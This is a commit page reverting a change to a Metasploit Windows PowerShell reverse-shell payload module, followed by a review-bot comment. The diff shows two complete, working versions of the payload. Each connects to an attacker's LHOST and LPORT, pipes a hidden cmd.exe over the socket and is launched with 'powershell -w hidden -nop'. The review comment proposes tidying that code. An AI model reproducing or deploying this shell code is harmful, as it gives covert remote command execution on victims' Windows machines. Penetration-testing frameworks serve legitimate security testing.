
Revert "Land #12945, fix the cmd/windows/reverse_powershell payload"

This reverts commit 564895e1a8, reversing
changes made to c1b2762b03.

This appears to make it worse.
bwatters-r7 1 month ago
parent
commit
9ef6110b54
1 changed files with 40 additions and 52 deletions
  1. 40
    52
      modules/payloads/singles/cmd/windows/reverse_powershell.rb

+ 40
- 52
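--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1481
+  CachedSize = 1228
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -57,57 +57,45 @@ module MetasploitModule
   def command_string
     lhost = datastore['LHOST']
     lport = datastore['LPORT']
-    powershell = %Q^
-$a='#{lhost}';
-$b=#{lport};
-$c=New-Object system.net.sockets.tcpclient;
-$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
-$ob=New-Object System.Byte[] 65536;
-$eb=New-Object System.Byte[] 65536;
-$e=new-object System.Text.UTF8Encoding;
-$p=New-Object System.Diagnostics.Process;
-$p.StartInfo.FileName='cmd.exe';
-$p.StartInfo.RedirectStandardInput=1;
-$p.StartInfo.RedirectStandardOutput=1;
-$p.StartInfo.RedirectStandardError=1;
-$p.StartInfo.UseShellExecute=0;
-$q=$p.Start();
-$is=$p.StandardInput;
-$os=$p.StandardOutput;
-$es=$p.StandardError;
-$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);
-$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);
-$c.connect($a,$b);
-$s=$c.GetStream();
-while ($true) {
-    start-sleep -m 100;
-    if ($osread.IsCompleted -and $osread.Result -ne 0) {
-      $s.Write($ob,0,$osread.Result);
-      $s.Flush();
-      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
-    }
-    if ($esread.IsCompleted -and $esread.Result -ne 0) {
-      $s.Write($eb,0,$esread.Result);
-      $s.Flush();
-      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);
-    }
-    if ($s.DataAvailable) {
-      $r=$s.Read($nb,0,$nb.Length);
-      if ($r -lt 1) {
-          break;
-      } else {
-          $str=$e.GetString($nb,0,$r);
-          $is.write($str);
-      }
-    }
-    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
-        break;
-    };
-    if ($p.ExitCode -ne $null) {
-        break;
-    };
-};
-^.gsub!("\n", "")
+    powershell = "function RSC{"\
+          "if ($c.Connected -eq $true) {$c.Close()};"\
+          "if ($p.ExitCode -ne $null) {$p.Close()};"\
+          "exit;"\
+        "};"\
+        "$a='#{lhost}';$p='#{lport}';$c=New-Object system.net.sockets.tcpclient;"\
+        "$c.connect($a,$p);$s=$c.GetStream();"\
+        "$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"\
+        "$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"\
+        "$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"\
+        "$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"\
+        "$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"\
+        "while($os.Peek() -ne -1){"\
+          "$o += $e.GetString($os.Read())"\
+        "};"\
+        "$s.Write($e.GetBytes($o),0,$o.Length);"\
+        "$o=$null;$d=$false;$t=0;"\
+        "while (-not $d) {"\
+          "if ($c.Connected -ne $true) {RSC};"\
+          "$pos=0;$i=1; "\
+          "while (($i -gt 0) -and ($pos -lt $nb.Length)) {"\
+            "$r=$s.Read($nb,$pos,$nb.Length - $pos);"\
+            "$pos+=$r;"\
+            "if (-not $pos -or $pos -eq 0) {RSC};"\
+            "if ($nb[0..$($pos-1)] -contains 10) {break}};"\
+            "if ($pos -gt 0){"\
+              "$str=$e.GetString($nb,0,$pos);"\
+              "$is.write($str);start-sleep 1;"\
+              "if ($p.ExitCode -ne $null){RSC}else{"\
+                "$o=$e.GetString($os.Read());"\
+                "while($os.Peek() -ne -1){"\
+                  "$o += $e.GetString($os.Read());"\
+                  "if ($o -eq $str) {$o=''}"\
+                "};"\
+                "$s.Write($e.GetBytes($o),0,$o.length);"\
+                "$o=$null;"\
+                "$str=$null"\
+              "}"\
+            "}else{RSC}};"\
 
     "powershell -w hidden -nop -c #{powershell}"
   end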
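Review bot: On the restored line `"$a='#{lhost}';$p='#{lport}';$c=New-Object system.net.sockets.tcpclient;"` the PowerShell variable `$p` holds the port, and three statements later `"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"` reuses the same name for the child process object, so one identifier means two unrelated things inside the same script and the code is correct only because `$c.connect($a,$p)` happens to run before the reassignment. A distinct name on the assignment line, e.g. `$lp='#{lport}'`, together with `"$c.connect($a,$lp);$s=$c.GetStream();"`, removes that ordering dependency and reads more clearly. Similarly, `$i=1` is never modified after `"$pos=0;$i=1; "`, so the `($i -gt 0)` half of the inner `while` condition is always true and could be dropped, leaving the buffer-length bound and the `break` on a newline byte as the documented exits. The `command_string` method lies entirely within this hunk; the enclosing module starts before it.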
